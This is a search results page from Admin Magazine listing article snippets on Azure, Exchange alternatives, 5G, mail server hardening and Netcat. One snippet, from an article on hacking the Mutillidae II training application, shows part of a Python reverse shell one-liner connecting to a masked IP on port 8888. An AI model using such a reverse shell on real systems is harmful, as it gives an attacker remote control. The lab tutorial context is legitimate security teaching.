Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Digisub
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Spell check suggestion: Internet case situation 2 hand(711bmw.com)Internet case situation 2 hand(711bmw.com)w0s ?

Refine your search
Sort order
  • Date
  • Score
Content type
  • Article (Print) (465)
  • Article (88)
  • News (3)
  • Blog post (2)
Keywords
Creation time
  • Last day
  • Last week
  • Last month
  • Last three months
  • Last year

« Previous 1 ... 41 42 43 44 45 46 47 48 49 50 51 52 53 54 ... 56 Next »

6%
Putting an Active Directory domain controller in the Azure cloud
13.02.2017
Home »  Archive  »  2017  »  Issue 37: Distr...  » 
Lead Image © Sergey Nivens, 123RF.com
files to Azure [2]. Pay attention to what you call the components you add to your cloud network. As your network grows, you'll find it much easier to navigate if you use a naming convention that gives
6%
A feature-rich drop-in-replacement for Microsoft Exchange
27.09.2024
Home »  Archive  »  2024  »  Issue 83: Storage  » 
Photo by cdd20 on Unsplash
for "shoddy security, insincerity" and "cascades of security failures" [2]. MAPI: The Curse of Exchange Protocols Under the pressure of new European Union regulations such as the General Data Protection
6%
Hacking Mutillidae II
03.08.2023
Home »  Archive  »  2023  »  Issue 76: Energ...  » 
Photo by USGS on Unsplash
,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("XXX.XXX.XXX.XXX",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p
6%
Netcat – The Admin’s Best Friend
20.08.2012
Home »  Articles  » 
 
With the seemingly unlimited number of Linux packages available today in repositories, sometimes it’s easy to get lost and miss out on the really high quality packages – those that offer the most ... examplehost.tld 22 If firewalling is in place and you need to originate your connection from a specific IP address to open a port, entering # nc -s 1.2.3.4 examplehost.tld 8181 will connect to examplhost ... With the seemingly unlimited number of Linux packages available today in repositories, sometimes it’s easy to get lost and miss out on the really high quality packages – those that offer the most ... Netcat – The Admin’s Best Friend
6%
Private 5G networks for industry and business
20.06.2022
Home »  Archive  »  2022  »  Issue 69: Terra...  » 
Photo by Tyler Nix on Unsplash
that can be deployed on both 4G and 5G technology. A 5G campus network is designed to meet special requirements (e.g., to allow Industry 4.0 [1] applications to communicate). The market for 5G campus
6%
SQL Server 2022 and Azure
06.10.2022
Home »  Archive  »  2022  »  Issue 71: Kuber...  » 
Lead Image © Dmitriy Shpilko, 123RF.com
, as is the case with any new SQL Server version. Infos Azure Hybrid Advantage for SQL Server: https://azure.microsoft.com/en-us/pricing/hybrid-benefit/ Database Migration Service: https://docs
6%
Hardening mail servers, clients, and connections
03.04.2024
Home »  Archive  »  2024  »  Issue 80: Threa...  » 
Photo by jesse ramirez on Unsplash
advertising messages, fraud attempts, spoofed sender addresses, and many other dirty tricks began to flourish. Since then, associations such as the Internet Engineering Task Force (IETF), which defines ... If you don't want to hand over your mail to a corporation, you have to operate your own mail server. Securing it sensibly involves some effort.
6%
Transparent SIP communication with NAT
30.01.2020
Home »  Archive  »  2020  »  Issue 55: AWS L...  » 
Lead Image © studiom1, 123RF.com
, the limited availability of IP addresses led to the development of various strategies by the Internet Engineering Task Force (IETF) for covering a wide environment with the available addresses. One
6%
Build operating system images on demand
30.01.2020
Home »  Archive  »  2020  »  Issue 55: AWS L...  » 
Lead Image © Nataliya Hora, 123RF.com
rebuilding from the source and, sooner or later, give up. In most cases it is not possible to achieve the same image quality as that of the distributors. Either the DIY images are bulky and far too big
6%
Cyber security for the weakest link
05.02.2019
Home »  Archive  »  2019  »  Issue 49: Anato...  » 
Photo by Geran de Klerk on Unsplash
such a hacker currently proceed in practice? In principle, an attack always follows the same phases: 1. Break-in 2. Persistence 3. Preparatory work (lateral movement) 4. Perseverance and system surveillance

« Previous 1 ... 41 42 43 44 45 46 47 48 49 50 51 52 53 54 ... 56 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2025 Linux New Media USA, LLC – Legal Notice